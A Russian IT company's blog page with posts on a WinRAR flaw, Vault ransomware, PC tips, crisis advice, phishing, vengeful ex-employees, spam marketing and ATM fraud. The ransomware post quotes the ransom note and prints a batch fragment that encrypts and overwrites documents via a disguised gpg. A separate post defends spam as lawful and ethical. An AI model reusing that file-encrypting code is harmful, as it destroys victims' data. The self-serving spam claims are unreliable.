ТЕХНОБЛОГ - новости и события. Используя возможности блога...

Постараемся информировать посетителей сайта, а также наших клиентов о последних новостях и событиях

Чт

01

окт

2015

Критическая «дыра» в WinRAR

В популярном архиваторе WinRAR, которым пользуются свыше 500 млн людей во всем мире, обнаружена критическая уязвимость, позволяющая злоумышленникам дистанционно выполнить в системе произвольный код. Специалисты обнаружили в последней стабильной версии утилиты WinRAR (5.21) критическую уязвимость, позволяющую злоумышленнику дистанционно выполнить на компьютере жертвы произвольный код. Информация об этом появилась на сайте Vulnerability Laboratory, представляющим собой агрегатор уязвимостей.

 

Уязвимость содержится в функции Text and Icon. Она позволяет злоумышленникам интегрировать в самораспаковывающийся RAR-архив вредоносный HTML-код. Этот код достаточно поместить в поле «Text to display in SFX window» при создании архива. Когда пользователь запустит файл архива, код автоматически исполнится. Он может активировать загрузку на компьютер жертвы троянов или шпионского софта, утверждают исследователи.

 

В настоящий момент на официальном сайте WinRAR — rarlab.com — опубликована бета-версия WinRAR 5.30, однако не упоминается, была ли в ней описанная уязвимость устранена. Разработчики WinRAR разместили на сайте сообщение по поводу находки, опубликованной в Vulnerability Laboratory. Они указали на тот факт, что самораспаковывающийся RAR-архив представляет собой исполняемый файл (с расширением EXE). Поэтому бить тревогу о том, что он может содержать вредоносный код, бессмысленно. Так как под EXE-файлом может быть замаскирован вообще любой вирус. И пользователь не будет знать об этом, пока не запустит его. Таким образом, все сводится к надежности источника, из которого RAR-архив был получен.

Комментариев: 0

Пт

28

авг

2015

Новая волна вирусных атак

В последнее время участились случаи успешных вирусных атак, в результате которых безвозвратно оказываются зашифрованными файлы пользователей.

Это не ново, однако злоумышленники стали хитрее, и разработали сценарий, который целиком и полностью зависит от действий юзера. Ни антивирус, ни фаервол не способен от этого защитить.

Как же все происходит? 

Я расскажу, что мне удалось нагуглить и найти самостоятельно.

Все начинается с того, что у вас на рабочем столе внезапно открывается текстовый файл в блокноте следующего содержания:

Ваши рабочие документы и базы данных были заблокированы и помечены форматом .vаult

Для их восстановления необходимо получить уникальный ключ
 

ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА:
 

КРАТКО

1. Зайдите на наш веб-ресурс

2. Гарантированно получите Ваш ключ

3. Восстановите файлы в прежний вид
 

ДЕТАЛЬНО

Шаг 1:

Скачайте Tor браузер с официального сайта: https://www.torproject.org

Шаг 2:

Используя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion

Шаг 3:

Найдите Ваш уникальный VAULT.KEY на компьютере — это Ваш ключ к личной клиент-панели. Не удалите его

Авторизуйтесь на сайте используя ключ VAULT.KEY

Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой

STEP 4:

После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО
 

ДОПОЛНИТЕЛЬНО

a) Вы не сможете восстановить файлы без уникального ключа (который безопасно хранится на нашем сервере)

b) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP

c) Ваша стоимость восстановления не окончательная, пишите в чат
 

Дата блокировки: 26.08.2015 (10:51)

Появление такого сообщения уже означает, что vault вирус заразил ваш компьютер и начал шифрование файлов. В этот момент необходимо сразу же выключить компьютер, отключить его от сети и вынуть все сменные носители. Как провести лечение от вируса поговорим позже, а пока я расскажу, что же произошло у вас в системе.

Скорее всего вам пришло письмо по почте от доверенного контрагента или замаскированное под известную организацию. Это может быть просьба провести бухгалтерскую сверку за какой-то период, просьба подтвердить оплату счета по договору, предложение ознакомиться с кредитной задолженностью в сбербанке или что-то другое. Но информация будет такова, что непременно вас заинтересует и вы откроете почтовое вложение с вирусом. На это и расчет!

Итак, вы открываете вложение, которое имеет расширение .js и является ява скриптом. По идее, это уже должно вас насторожить и остановить от открытия, но как показывает практика, мало кого это насторожило и остановило. Скрипт скачивает с сервера злоумышленников троян или баннер vault, как его в данном случае можно назвать, и программу для шифрования. Складывает все это во временную директорию пользователя. И сразу начинается процесс шифрования файлов во всех местах, куда у пользователя есть доступ — сетевые диски, флешки, внешние харды и т.д.

В качестве шифровальщика vault выступает бесплатная утилита для шифрования gpg и популярный алгоритм шифрования — RSA-1024. Так как по своей сути эта утилита много где используется, не является вирусом сама по себе, антивирусы пропускают и не блокируют ее работу. Формируется открытый и закрытый ключ для шифрования файлов. Закрытый ключ остается на сервере хакеров, открытый на компьютере пользователя.

Проходит некоторое время после начала процесса шифрования. Оно зависит от нескольких факторов — скорости доступа к файлам, производительности компьютера. Дальше появляется информационное сообщение в текстовом файле, содержание которого я привел в самом начале. В этот момент часть информации уже зашифрована.

Обычно на Windows 7 с включенным UAC выскакивает запрос на ввод пароля администратора на любые действия в системе. Без ввода пароля вирус ничего сделать не сможет. Однако этот вирус начинает работу сразу после открытия файла из почты, никаких вопросов не задает. Потому что он не затрагивает системные области, живет во временной папке пользователя, и система не считает его действия опасными.

Что же конкретно делает с файлами вирус? На первый взгляд кажется, что он просто меняет расширение со стандартного на .vault. Увидев работу этого вирус-шифровальщика, я так и подумал, что это детская разводка. Переименовал обратно файл и очень удивился, когда он не открылся, как полагается, а вместо положенного содержания открылась каша из непонятных символов. Тут я понял, то все не так просто, начал разбираться и искать информацию.

Вирус прошелся по всем популярным типам файлов — doc, docx, xls, xlsx, jpeg, pdf и другим. К стандартному имени файла прибавилось новое расширение .vault. Некоторым он шифрует и файлы с локальными базами 1С. Меня, слава Богу, сия чаша обошла стороной. Простое переименование файла обратно, как вы понимаете, тут не помогает.

Так как процесс шифрования не мгновенный, может так получиться, что когда вы узнаете о том, что у вас шурует вирус на компьютере, часть файлов еще будет нормальная, а часть зараженная. Хорошо, если не тронутой останется большая часть. Но чаще всего на это рассчитывать не приходится.

Расскажу, что скрывается за сменой расширения. После шифрования, к примеру, файла file.doc рядом с ним вирус vault создает зашифрованный файл file.doc.gpg, затем зашифрованный file.doc.gpg перемещается на место исходного с новым именем file.doc, и только после этого переименовывается в file.doc.vault. Получается, что исходный файл не удаляется, а перезаписывается зашифрованным документом. После этого его невозможно восстановить стандартными средствами по восстановлению удаленных файлов. Вот часть кода, которая реализует подобный функционал:

dir /B "%1:"&& for /r "%1:" %%i in (*.xls *.doc) do (

echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"

echo %%i>> "%temp%\conf.list" )

Как удалить заразу и что делать потом.

После обнаружения вируса шифровальщика первым делом необходимо от него избавиться, проведя лечение компьютера. Лучше всего загрузиться с какого-нибудь загрузочного диска и вручную очистить систему. Вирус vault в плане въедливости в систему не сложный, вычистить его легко самому. Я подробно не буду останавливаться на этом моменте, так как тут подойдут стандартные рекомендации по удалению вирусов шифровальщиков, баннеров и троянов.

Само тело вируса находится во временной папке temp пользователя, который его запустил. Вирус состоит из следующих файлов. Названия могут меняться, но структура будет примерно такой же:
• 3c21b8d9.cmd
• 04fba9ba_VAULT.KEY
• CONFIRMATION.KEY
• fabac41c.js
• Sdc0.bat
• VAULT.KEY
• VAULT.txt

VAULT.KEY — ключ шифрования. Если вы хотите расшифровать ваши данные, этот файл обязательно надо сохранить. Его передают злоумышленникам, и они на его основе выдают вам вторую пару ключа, с помощью которого будет происходить расшифровка. Если этот файл потерять, данные восстановить будет невозможно даже за деньги.

CONFIRMATION.KEY — содержит информацию о зашифрованных файлах. Его попросят преступники, чтобы посчитать, сколько денег с вас взять.

Остальные файлы служебные, их можно удалять. После удаления надо почистить автозагрузку, чтобы не было ссылок на удаленные файлы и ошибок при запуске. Теперь можно запускать компьютер и оценивать масштабы трагедии.

Компьютер мы вылечили, что могли, восстановили, прервав шифрование. Теперь надо попытаться расшифровать файлы. Конечно, проще и желанней всего было бы получить готовый дешифратор vault для расшифровки, но его не существует. Увы, но создать инструмент, чтобы дешифровать данные, зашифрованные ключом RSA-1024 технически невозможно.

Так что к великому сожалению, вариантов тут не очень много:
1. Вам очень повезло, если у вас включена защита системы. Она включается для каждого диска отдельно. Если это было сделано, то вы можете воспользоваться инструментом восстановления предыдущих версий файлов и папок. Однако последние модификации этого вируса в процессе работы затирают теневые копии, и восстановить предыдущие версии файлов невозможно.
2. Если у вас оказались зашифрованы файлы на сетевых дисках, ищите архивные копии. Только бекап спасет.
3. Если у вас пострадали данные в папках, которые подключены к хранилищам данных в интернете типа Яндекс. Диск, Dropbox, Google disk, загляните к ним в корзину, там должны остаться оригинальные файлы до шифрования.
4. Попробуйте найти файл secring.gpg. Файл этот должен быть создан на вашей машине (как правило в %TEMP% юзера) в момент запуска процесса шифрования. К сожалению, вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает данный ключ с помощью утилиты sdelete.exe. Я нашел этот файл, который по сути является закрытым ключом шифрования, но, к сожалению, он оказался пустым:( Повторный запуск шифратора с целью получения этого ключа не поможет. Ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов не подойдет. Пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера ~1Кб.

Если ничего из перечисленного выше не помогло, а информация зашифровалась очень важная, у вас остается только один вариант — платить деньги создателям вируса для получения дешифратора vault. По отзывам в интернете это реально работает, есть шанс с высокой долей вероятности восстановить свои файлы. Если бы это было не так, то никто бы не платил деньги после нескольких отрицательных отзывов.

Вирус vault настолько популярен, что в сети появилась реклама, где некие товарищи предлагают за деньги торговаться с хакерами, чтобы сбить цену на расшифровку данных. Я не знаю, насколько реально они сбивают цену и сбивают ли вообще, возможно это просто разводилы, которые возьмут с вас деньги и смоются. Тут уже действуйте на свой страх и риск. Я знаю только, что сами хакеры реально восстанавливают информацию. Одна знакомая компания, где пострадали сетевые диски, и из бэкапов не смогли полностью восстановить данные, заплатили злоумышленникам и смогли восстановить часть информации. Но только часть, потому что вышла накладка. Так как было почти одновременно заражено несколько компьютеров, то и шифрование производилось не с одного, а как минимум с двух одновременно. При оплате же ты покупаешь только один ключ дешифратора vault от одной машины. Чтобы расшифровать файлы, зашифрованные вторым компьютером пришлось бы отдельно покупать закрытый ключ еще и к нему. Это делать не стали, удовлетворившись полученным результатом.

Какую цену назначат за расшифровку зависит от количества зашифрованных файлов и от умения найти общий язык с шифраторами. С хакерами возможно живое общение в чате. Информация о ваших зашифрованных файлах хранится в CONFIRMATION.KEY, о котором я упоминал ранее. Так же для расшифровки вам понадобится VAULT.KEY. Как связаться с хакерами рассказано непосредственно в информационном сообщении, которое вы получаете после заражения. Сервер хакеров работает не круглосуточно, а примерно 12 часов в сутки. Вам придется сидеть и проверять время от времени его доступность.

Больше мне нечего добавить по теме дешифровки данных. Вообще, выходит чистая уголовщина и суммы гоняют приличные эти негодяи. Но как найти управу на преступников я не знаю. Куда жаловаться? Участковому?

Повторю еще раз на всякий случай. Для описанной мной модификации vault дешифратора не существует! Не тратьте деньги, если кто-то будет предлагать вам его купить. Создать дешифратор vault в данном случае технически невозможно.

А что же антивирусы нам могут предложить в борьбе с этой зашифрованной напастью? Лично я был свидетелем заражения вирусом на компьютерах с установленной и полностью обновленной лицензионной версией eset nod32. Он никак не отреагировал на запуск шифровальщика. Возможно уже сейчас что-то изменилось, но на момент моего поиска информации по данному вопросу, ни один из вирусов не гарантировал защиту пользователя от подобных угроз. Я читал форумы популярных антивирусов — Kaspersky, DrWeb и другие. Везде разводят руками — помочь с дешифровкой мы не можем, это технически невозможно.

Один раз в новостях Касперского проскочила инфа, что правоохранительные органы Голландии арестовали злоумышленников и конфисковали их сервер с закрытыми ключами шифрования. С помощью добытой информации умельцы из Kaspersky сварганили дешифратор, с помощью которого можно было восстановить зашифрованные файлы. Но, к сожалению, это были не те хакеры, с которыми столкнулся я и мне тот дешифровщик ничем не помог. Возможно, когда-нибудь и этих поймают, но достаточно велик шанс, что к этому времени зашифрованные файлы уже будут не актуальны.

Ответ Службы Технической Поддержки ЗАО «Лаборатория Касперского»:

Здравствуйте! В последнее время мы часто получаем запросы, связанные с действиями программ-шифровальщиков.
Некоторые вредоносные программы-шифровальщики используют технологии шифрования с помощью открытого ключа. Сама по себе эта технология является надежным способом защищенного обмена важными сведениями, однако злоумышленники используют её во вред. Они создают программы, которые, попав в компьютер, шифруют данные таким образом, что расшифровать их можно только имея специальный «приватный» ключ шифрования. Его злоумышленники, как правило, оставляют у себя и требуют деньги в обмен на ключ. К сожалению, в данной ситуации информацию практически невозможно расшифровать за приемлемое время, не имея «приватного» ключа шифрования. Лаборатория Касперского ведёт постоянную работу по борьбе с подобными программами. В частности, иногда, принцип шифрования, используемый злоумышленниками, удается выяснить благодаря изучению кода вредоносной программы и создать утилиту для дешифровки данных. Тем не менее, существуют образцы вредоносного ПО, анализ которых не дает подобной ценной информации.Для расшифровки файлов воспользуйтесь нашими утилитами (Rector Decryptor, RakhniDecryptor, RannohDecryptor, ScatterDecryptor или Xorist Decryptor). Каждая утилита содержит краткое описание, небольшую информацию о признаках заражения и инструкцию по работе. Пожалуйста, попробуйте выполнить расшифровку, выбрав соответствующую по описанию утилиту. Если расшифровать файлы не удалось, необходимо дождаться очередного обновления утилиты. Дата обновления для каждой утилиты указана в явном виде.
К сожалению, это всё, что можно сделать в данном случае.

Ответ Drweb:

Здравствуйте. К сожалению, в данном случае расшифровка не в наших силах.
Собственно шифрование файлов выполнено общедоступным легитимным криптографическим ПО GPG (GnuPG) Криптосхема на базе RSA-1024. Подбор ключа расшифровки, к сожалению, невозможен.
Основная рекомендация:
обратитесь с заявлением в территориальное управление «К» МВД РФ по факту несанкционированного доступа к компьютеру, распространения вредоносных программ и вымогательства. Образцы заявлений, а также ссылка на госпортал («Порядок приема сообщений о происшествии в органах внутренних дел РФ») есть на нашем сайте.
Поскольку это RSA-1024, без содействия со стороны автора/хозяина троянца — вольного или невольного (арест соотв. людей правоохранительными органами) — расшифровка не представляется практически возможной.

Методы защиты от vault вируса

Какого-то надежного и 100%-го способа защиты от подобных вирусов не существует. Можно лишь повторить стандартные рекомендации, которые актуальны для любых вирусов в интернете:
1. Не запускать незнакомые приложения, ни в почте, ни скачанные из интернета. Стараться вообще из интернета ничего не качать и не запускать. Там сейчас столько всякой гадости валяется на «файлопомойках», что защититься от них без должного понимания практически невозможно. Лучше компетентного знакомого попросить что-то найти в интернете и отблагодарить его за это :))))
2. Всегда иметь резервную копию важных данных. Причем хранить ее нужно отключенной от компьютера или сети. Хранить отдельную флешку или внешний жесткий диск для архивных копий. Подключать их раз в неделю к компьютеру, копировать файлы, отключать и больше не пользовать. Для повседневных нужд приобрести отдельные устройства, сейчас они очень доступны, не стоит экономить. В современный век информационных технологий информация — самый ценный ресурс, важнее носителей. Лучше купить лишнюю флешку, чем потерять важные данные.
3. Повысить меру своего понимания происходящих в компьютере процессах. Сейчас компьютеры, планшеты, ноутбуки, смартфоны настолько плотно вошли в нашу жизнь, что не уметь в них разбираться значит отставать от современного ритма жизни. Никакой антивирус и специалист не сможет защитить ваши данные, если вы сами не научитесь это делать. Уделите время, почитайте тематические статьи на тему информационной безопасности, сходите на соответствующие курсы, повысьте свою компьютерную грамотность. Это в современной жизни обязательно пригодится.

Обращаю Ваше внимание! Без содействия пользователя, данный вирус бесполезен и никак не сможет что-либо натворить!

Комментариев: 0

Чт

19

фев

2015

Как ускорить ваш компьютер: пять простых советов

"Да что ж такое-то, я ж его только недавно купил!" - в очередной раз восклицаете вы. На самом деле это случилось ещё шесть лет назад - вы как раз тогда прельстились выгодным обменным курсом.

"Что ж оно так долго открывается-то?" - недоумеваете вы. Вы уже просто готовы рвать на себе волосы.

Если вы не являетесь экспертом в области IT, но всё же предпочитаете менять свой компьютер несколько реже, чем меняете рубашку, Русская служба Би-би-си собрала для вас несколько хитростей для поддержания работоспособности вашего Мака или PC - простых шагов, подходящих всем, в независимости от уровня вашей компьютерной грамотности.


1. Дефрагментируйте жёсткий диск

Может быть, вы даже не знаете, что значит это слово, тогда вы еще больше удивитесь, насколько важен этот процесс для нормальной работы компьютера.

Дефрагментация ускоряет процесс чтения файлов и переходов между ними, подчищая ненужную информацию и реструктурируя данные. Даже самые современные жесткие диски со временем начинают подтормаживать из-за того, каким образом на них хранятся файлы. По мере того как файлы записываются и удаляются, они всё чаще разбиваются на фрагменты, хранящиеся в разных частях физического диска, а не в одном. Это существенно усложняет процесс доступа к файлам.

Прежде чем покупать новый компьютер, попробуйте дефрагментировать свой старый. Таким образом, организуя и структурируя распределение данных, вы не только увеличите свободное место на диске, но и значительно упростите своему компьютеру доступ к информации. Сделать это совсем несложно - для этого есть специальные программы: Smart Defrag 3 для Microsoft Windows 8.1 или iDefrag для OS X от компании Apple.


2. Удалите ненужные файлы

В наши дни забить до отказа жёсткий диск объёмом до 200 Гб совсем не сложно. И чем меньше на нём остаётся свободного места, тем сложнее становится завершить любую операцию. Наверняка на вашем диске хранится огромное количество старых файлов, которыми вы давно не пользуетесь за ненадобностью, но которые занимают ценное место. И определить, что это за файлы, не сложнее, чем скачать приложение для телефона. Наверняка у вас есть куча ненужных файлов, которые лишь занимают ценное место на диске.

Их на рынке множество - как для PC, так и для Маков. Первым будут полезны программы вроде SpaceSniffer или WinDirStat - они подскажут, какие файлы занимают на диске больше всего места. Если вы работаете на Маке, сделать это ещё проще, используя поиск в программе Finder. Он предоставляет возможность наглядно увидеть всё содержимое компьютера, в том числе все приложения и программы, жесткие диски, файлы, папки и приводы DVD. Отсюда вы можете структурировать свои файлы, вести поиск по всем дискам сразу и удалять любую ненужную информацию.


3. Не используйте автоматический запуск файлов

Это один из самых простых способов ускорить работу компьютера - особенно время загрузки. Можно отслеживать, какие программы запущены на вашем компьютере. в режиме реального времени - и останавливать их работу, если они вам не нужны.

Сделать это можно при помощи программ Activity Manager на Маках и Task Manager на PC. На Макинтоше зайдите в System Preferences, оттуда в Users and Groups - и кликните на запущенные программы, которые вы хотите остановить. В случае с PC вы можете воспользоваться бесплатной программой Autoruns, которая отвечает за автоматический запуск приложений. Выбирайте антивирус, подходящий под спецификацию вашего компьютера.


4. Избавьтесь от вирусов и вредоносных программ

Некоторые утверждают, что можно обойтись и без антивирусных программ, так как те отнимают слишком много оперативной памяти и мощностей процессора, особенно на старых персональных компьютерах. Однако для тех, кто не является экспертом в области IT, лучше перестраховаться и всё же установить антивирус. Выбирать антивирусную программу нужно, исходя из спецификаций вашего компьютера. Среди программ, которые требуют наименьших ресурсов, можно назвать Microsoft Security Essentials, Panda Cloud и Avira. Для PC таких программ очень много. Несмотря на широкое распространение мифа о том, что продукция Apple устойчива к вирусам, вам следует обратить внимание, в случае если ваш Мак вдруг начал работать медленнее, чем обычно. Установите себе бесплатный антивирус, например, Avast или Sophos.


5. Используйте веб-приложения

Зачем мучаться с установкой и использованием программ пакета Microsoft Office, если хранение файлов и всю работу с ними можно перенести "на облако" при помощи сервисов Google Docs, Adobe’s Buzzword, Zoho или Peepel? Если вас выводит из себя медленно работающий компьютер, попробуйте эти пять шагов, прежде чем переходить к крайним мерам. Современные веб-приложения, работающие через любой браузер, способны выполнять практически любые задачи при работе с документами. При этом у них есть два неоспоримых преимущества: они отнимают значительно меньше ресурсов у компьютера и не занимают места на жёстком диске. Но если вы испробовали все пять способов, а ваш компьютер по-прежнему жутко тормозит, пожалуй, вам всё-таки стоит вызвать специалиста-ремонтника, а то и подумать о покупке новой машины.

http://www.bbc.co.uk

Комментариев: 0

Пн

17

ноя

2014

20 важных правил выживания во время кризиса

Падение рубля привело к взрыву советов разной степени странности: купите айфон, запаситесь вином, кастрируйте кота, вложитесь в золото, продайте квартиру. Доктор экономических наук Яков Миркин сформулировал 20 правил выживания в кризисе, объяснимых и наукой, и здравым смыслом.

Яков Миркин — Доктор экономических наук, председатель Совета директоров инвестиционной компании «Еврофинансы», профессор Финансового университета

1. Всем не запасешься.
2. Все, что может, должно приносить доход — любое лишнее имущество.
3. Все, кто могут, тоже должны приносить доход. Нет денег — зато есть льготы.
4. Больше всего денег дают хорошие идеи.
5. Выживают за счет связей с другими людьми. Легче всего тем, кто дружит, имеет подход и понимает правила. То есть экстравертам.
6. Из российских кризисов веками выползают землей, огородами и садами.
7. Не спекулируйте по мелочи. Все равно проиграете против профи.
8. Вкладываясь на годы, не пытайтесь отыграть копейку. В чем-нибудь да попадетесь.
9. Лучше жить, а не выживать. Лучшие инвестиции — в себя, в детей и в родителей. В умения и здоровье. Больше умений — больше доход, больше гибкости, больше выбора.
10. Мы все — товары на рынке труда, худшего или лучшего качества. Даже в кризисе удерживайте качество.
11. Вкладывайтесь не в запас, а в то, что приносит регулярный доход.
12. Не стойте на одной ноге. Лучше уж на шести. Используйте разные активы, разные вложения, разные доходы. Но управлять этим всем должен один центр
13. Мобильность, страсть к изменениям, к чему-нибудь новенькому: вот на чем стали богатеть США.
14. Избавляйтесь от ликвидных, легко сбываемых активов, но не пытайтесь продать нечто ценное. В 1998 году квартиры упали в цене в 2–3 раза. Акции — в 15 раз. Объекты искусства в кризис могут не стоить ничего вообще в сравнении с их настоящей ценностью.
15. Сомневаетесь, нужно ли покупать активы (валюту, вещи, акции), — не покупайте. Не знаете, входить ли на рынок, — не входите. Если очень уж хочется, то не вкладывайте больше 30–50%, чтобы разделить риски. Если потеряете, не так обидно. Если выиграете, то все-таки выигрыш за вами.
16. Таким экономикам, как российская, во время кризиса помогает выжить теневой сектор. Неформальные отношения. То, что мимо государства. Это экономический закон.
17. Просчитывайте на будущее. У кризисов всегда бывает конец.
18. Все это — шахматы. Выбрал плохую позицию — идешь ко дну. Выбрал правильную, с правильным человеком, в правильном месте — подбрасывает вверх. Прогнозируйте, еще раз прогнозируйте, и так тысячу раз — пытайтесь считать на несколько ходов вперед.
19. Бывают обстоятельства непреодолимой силы. Таким обстоятельством может стать государство и то, что оно делает. Не вините себя.
20. Есть люди, которым все это не дано. Зато дано другое. Тем больше — не вините себя

Комментариев: 0

Вт

21

окт

2014

ВНИМАНИЕ!!! Волна атак ВЫМОГАТЕЛЕЙ и МОШЕННИКОВ!!!

Уважаемые наши клиенты! Руководители бизнеса! Бухгалтерия! Менеджеры!

ВНИМАНИЕ!!!

Волна атак ВЫМОГАТЕЛЕЙ и МОШЕННИКОВ!!!

Сейчас корпоративную почту многих фирм атакуют письма (достаточно грамотно составленные, порой – с просьбой оплатить какой-то счет, порой уведомляют о своей оплате заказа, порой от лица судов) с вложенным файлом или ссылкой на его скачивание.

При открытии ссылки/файла все файлы (кроме, конечно, системных) на компьютере меняют расширение на .paycrypt@gmail.com и не поддаются дешифровке. Пока единственный способ дешифровать файлы – отправить мошенникам очень ощутимую сумму (от 120 до 900 евро ЗА ОДИН КОМПЬЮТЕР), причем попытка использования ключа, высланного другому пострадавшему пользователю, может означать однозначное прощание со своими файлами.

Способов спасти файлы, минуя оплату мошенникам, пока не предоставляет даже «Лаборатория Касперского»!!!

Будьте внимательны! Не открывайте подобных файлов! Не запускайте программу шифровки! Даже если письмо от знакомого лица!!!


Сомневаетесь? Лучше перезвоните «источнику» письма!

Только если файл с расширением Word,  Excel,  Txt  !!!

Комментариев: 0

Чт

17

июл

2014

Месть уволенных сотрудников!

В условиях экономического кризиса многие компании вынуждены сокращать штат. К сожалению, в России не вошло в привычку увольнять сотрудников грамотно. Речь идет не только о соблюдении всех юридических норм, но и о проведении адаптационной программы для увольняемых, которая во многих компаниях в лучшем случае ограничивается выходным интервью. Когда под сокращение попадает треть или половина персонала компании, HR-менеджерам не хватает времени даже на «прощальные» беседы. К чему вообще хлопотать об уволенных, возможно, спросите Вы?

 

Затем, чтобы впоследствии не пришлось хлопотать о выплате судебных исков от бывших сотрудников! Закрыв за сотрудником дверь, не стоит наивно полагать, что тем самым вы поставили точку в деле увольнения. Особенно если в процессе расставания с работником компания допустила ошибки или (что еще хуже) правонарушения. В каких ситуациях стоит опасаться «мести» уволенных сотрудников?

 

Месть – блюдо, которое подается холодным!

Как правило, работники решаются «насолить» компании в случае незаконного увольнения: сокращения без должных компенсаций, необоснованного увольнения «по статье». Мстят подчиненные бывшим руководителям, которые, по их мнению, отличались недобросовестностью. Несогласие с политикой компании может вызвать желание досадить бывшему работодателю.

 

Австралийский программист Дэвид Энтони Макинтош отомстил за увольнение, взломав правительственный компьютерный сервер. Макинтош удалил из базы данных все сведения о более 10 тысячах служащих. Также среди пострадавших от взлома правительственных ресурсов оказались сервера министерства здравоохранения, тюрьмы и суда. Увольнение молодого программиста, оставшегося недовольным руководством, обошлось правительству Австралии в сумму, превышающую 650 тысяч долларов. Судебное разбирательство по данному делу длится уже более года. Недавно подсудимый признал себя виновным по 12 эпизодам неправомерного доступа и изменения данных правительственных ресурсов. Адвокат обвиняемого настаивает на проведении психологической экспертизы.

 

Месть уволенных может быть реализована как в рамках закона, так и вне правового поля. Одни сотрудники предпочитают бороться с работодателями-обидчиками посредством обращений в трудовую инспекцию, налоговые органы (если на то имеются основания), другие... Ассортимент блюд из мести органичен только фантазией и злопамятностью уволенного. Наиболее распространенные варианты: разглашение коммерческой тайны, передача конкурентам (бескорыстная или за неплохую мзду) клиентской базы. В последнее время уволенные сотрудники стали прибегать к помощи СМИ: испортить репутацию компании посредством публичного скандала очень легко. IT-специалисты используют для отмщения арсенал профессиональных знаний: атаки на сервер компании, рассылка писем непристойного содержания с корпоративных почтовых ящиков клиентам и партнерам и многое другое.

 

Неуловимые мстители...

Вычислить недоброжелателя, «слившего» ценную информацию конкурентам или уничтожившего базу клиентов, оказывается не так уж и сложно, но вот доказать его вину в судебном порядке, а тем паче получить материальную компенсацию за нанесенный ущерб, гораздо труднее. Какой бы серьезной ни была ваша служба безопасности, системы защиты информации, обезопасить компанию от неприятных сюрпризов со стороны бывших сотрудников почти невозможно. Сомневаетесь? Сотни, а то и тысячи примеров свидетельствуют об обратном.

 

Наказать мстителей очень сложно, поэтому основные усилия стоит приложить для предотвращения войны, на тропу которой уволенных сотрудников в большинстве случаев подталкивают сами работодатели. Армия корпоративных юристов и секьюрити часто оказывается беспомощной против «партизанских» диверсий уволенных сотрудников. Компаниям следует внимательней отнестись к дипломатическим функциям и возможностям HR-отдела.

 

Плохой мир — лучше хорошей войны! Решать проблемы и разумнее, и комфортнее за столом переговоров, чем на скамье подсудимых. Не наживайте себе врагов!

Комментариев: 0

Вт

11

мар

2014

Рекламная e-mail рассылка

Расширяя бизнес, компания «Вертакс» рекламирует себя (в том числе) используя e-mail рассылку! Мы пользуемся услугами специализированных компаний. Иногда нам звонят (или пишут) возмущённые получатели нашей рекламы! Вообще у пользователей интернета существует миф, что e-mail рассылка - это что то плохое и поэтому  лучше не становиться получателями данного вида рекламы, тем более пользоваться услугами спамеров. В приведенном ниже тексте, мы постараемся изменить данное мнение.


Миф первый: Спам не приносит результатов…


Любая рассылка, которая разослана на сотни тысяч получателей - дает результат в десятки обращений! Согласно закону вероятности хотя бы один потенциальный клиент из десяти тысяч проявит свой интерес к нашему предложению!


Миф второй: Спам - это противозаконно…


Смеем Вас уверить: «В нашем законодательстве, реклама не запрещена!  Также отсутствует конкретное определение спама!». А вот если такой закон будет принят, тогда тысячи фирм станут банкротами!


Миф третий: К услугам спамеров прибегают исключительно мелкие безнадёжные предприятия…


По нашим наблюдениям, к услугам рекламных рассылок постоянно прибегают крупные, средние и мелкие компании, предприниматели, банки, обучающие центры и даже провайдеры интернета!


Миф четвёртый: Спам это неэтично…


Рассылка - это хороший способ поиска новых клиентов, особенно для начинающих предприятий. Мы утверждаем, что электронная рассылка является точно такой же рекламой, которая всегда мелькает на страницах журналов,  газет, веб сайтах, ТВ каналов и так далее!


Миф пятый: Спам приносит сплошной негатив…


Приведем пример: Еесли вы закажите свою рекламу на популярном телеканале, то к вам точно обратится огромное количество людей, но всегда найдётся несколько людей, которым ваш ролик покажется неинтересным, глупым, неэстетичным, некрасивым (да мало ли) и они непременно выскажут своё негативное мнение. Вот и в массовой e-mail рассылке всё точно также, обязательно отыщется тот, кому ваша реклама не понравиться!


Миф шестой: Спамеры постоянно хотят обмануть


На рынке услуг по ИТ имеются крупные и средние фирмы и организации, которые оказывают услуги на очень высоком уровне (смеем надеяться, что мы именно такие), но есть также мелкие, начинающие компании, а вот к кому лучше обратиться за услугой аутсорсинга в области ИТ, решать только Вам!


Миф седьмой: Спам это безобразно…


Расклеивать объявления рядом с магазинами, на столбах, слать или же осуществлять массовую e-mail рассылку - это совершенно нормально, ведь всякому бизнесу всегда нужны  клиенты, тем более что далеко не все могут позволить себе заказать рекламу на ТВ или радио!

Комментариев: 0

Вт

04

фев

2014

Банкоматная угроза: как обезопасить себя при снятии денег с карты

Пластиковыми картами пользоваться очень удобно, и это сделало их популярными во всем мире, в том числе в России. В то же время появилось много мошенников, которые изобрели разнообразные способы кражи денег с банковских карт. Такие преступные действия можно разделить на две большие группы.

 

Первый вариант: жертва хищения, которую ввели в заблуждение, сама переводит средства со своей карты. К примеру, человек получает SMS-сообщение о том, что его карта заблокирована и нужно позвонить по такому-то номеру. Или поступает краткое сообщение, например «Платеж совершен. Справка по телефону». Держатель карты перезванивает, и опытные преступники, обладающие приемами психологического влияния, вводят человека в заблуждение, чтобы он перевел средства на счет мошенников.

 

Если вы попали в подобную ситуацию, помните, что на номера телефонов, указанные в SMS, ни в коем случае перезванивать нельзя. Чтобы проверить, правдива ли полученная вами информация, позвоните в банк (телефон горячей линии кредитной организации указан на каждой карте) или зайдите в отделение финансового учреждения. 

 

Вторая группа преступлений — тайные хищения. Есть несколько способов такого мошенничества:

 

1. Когда карта и PIN-код каким-то образом оказываются в руках преступников. Чтобы обезопасить себя от подобной ситуации, никогда не записывайте PIN-код прямо на карте и не храните записку в кошельке. Ведь это ключ к вашим деньгам.

 

